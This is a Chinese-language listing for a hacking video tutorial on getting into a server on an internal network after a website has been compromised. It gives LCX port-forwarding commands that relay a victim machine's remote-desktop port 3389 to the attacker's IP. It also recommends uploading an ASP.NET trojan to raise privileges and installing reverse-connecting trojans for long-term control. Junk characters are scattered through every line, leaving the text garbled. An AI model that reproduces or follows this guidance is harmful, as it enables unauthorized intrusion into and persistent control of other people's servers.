软件简介:$ ~# t0 P- x, j6 I! C
(注意:这是语音教程,请打开您的音响,并且使用1024*768的屏幕分辨率来观看本教程!)3 q7 C1 s+ x; ]% B: [2 k
教程名称:端口映射内网提权教程
4 n1 D5 y# U5 p* ?7 K主讲:低调小飞
# F" o8 t r; V3 v1 ~8 V5 {说明:
$ W$ N9 `5 V3 G& ?, N1 N7 n5 y
7 q& G8 K% x& d) M2 \/ t) N 当我们成功入侵一个网站并拿到WEBSHELL,开放了对方的3389或是已经得到了对方SQL server 的SA用户密码时却发现该服务器处在一个内网 C% k% u f1 J- Y& e( L# L3 ?8 J
中环境,如:192.168.1.107 这样我们直接利用工具是无法成功连接的。那么我们就可以通过LCX端口转发来连接外网,再通过连接本机IP来连9 y+ X9 Y0 m. ]4 m5 ]. T+ }) G7 g
接对方服务器。+ f7 J0 s8 R. q/ s
LCX使用方法:& S+ g0 u" e3 A! C6 t3 u6 h
首先在自己机子的cmd下运行
5 q& C! _& {+ ?, Wlcx.exe -listen 110 33891! ~( c+ @# h0 Y9 e
意思是监听110端口并转发到33891端口
' O& F! r- ^8 S+ M* m然后在肉鸡上运行 lcx.exe -slave 你的IP 110 肉机IP 3389
7 z5 b3 ~0 R8 ^: s: s意思是 把肉机的3389端口 转发到 自己的IP 110端口上; @6 \3 O' q; L9 x1 ?# J
, }3 K; R2 t& r/ S8 F
问题分析:如果在入侵时ASP的控制权限过小,我们可以上传ASP.NET木马来扩大权限。再来做端口映射!) ?& `- |. Q0 A: U! g, W
3 Y! m3 j- [: t9 w
思路扩展:通过其他的手段,控制同网段其他机器,并对计算机安装反弹木马,这样来达到长期控制对方服务器!
2 K9 i9 A+ _/ @! x7 @5 l3 B=============================
0 f2 x( A p/ R3 P6 [( Q# B+ o41259640低調小飛技術交流群㈡ {7 M3 p+ h5 T {
41209575低調小飛技術交流群㈢9 y7 h) \# [$ P3 @ b* {6 P
41209451低調小飛技術交流群㈣
, F" J$ Q/ w5 [# u22387823低調小飛技術交流群㈤
; o q( h1 K. p. i; Z16599303低調小飛技術交流群㈥
# n9 N& X) p% q q: }0 a' ?7 L16639680低調小飛技術交流群㈦
( r! T( C$ l2 E" S( ?& s2 z41209297低調小飛技術交流群㈧
0 k6 l. d' ?& e( P5 V1 r2 R下载地址:
|
鲁公网安备 37132602371510号
流量统计
最新整理Linux手工服务端_末世策略塔防手游
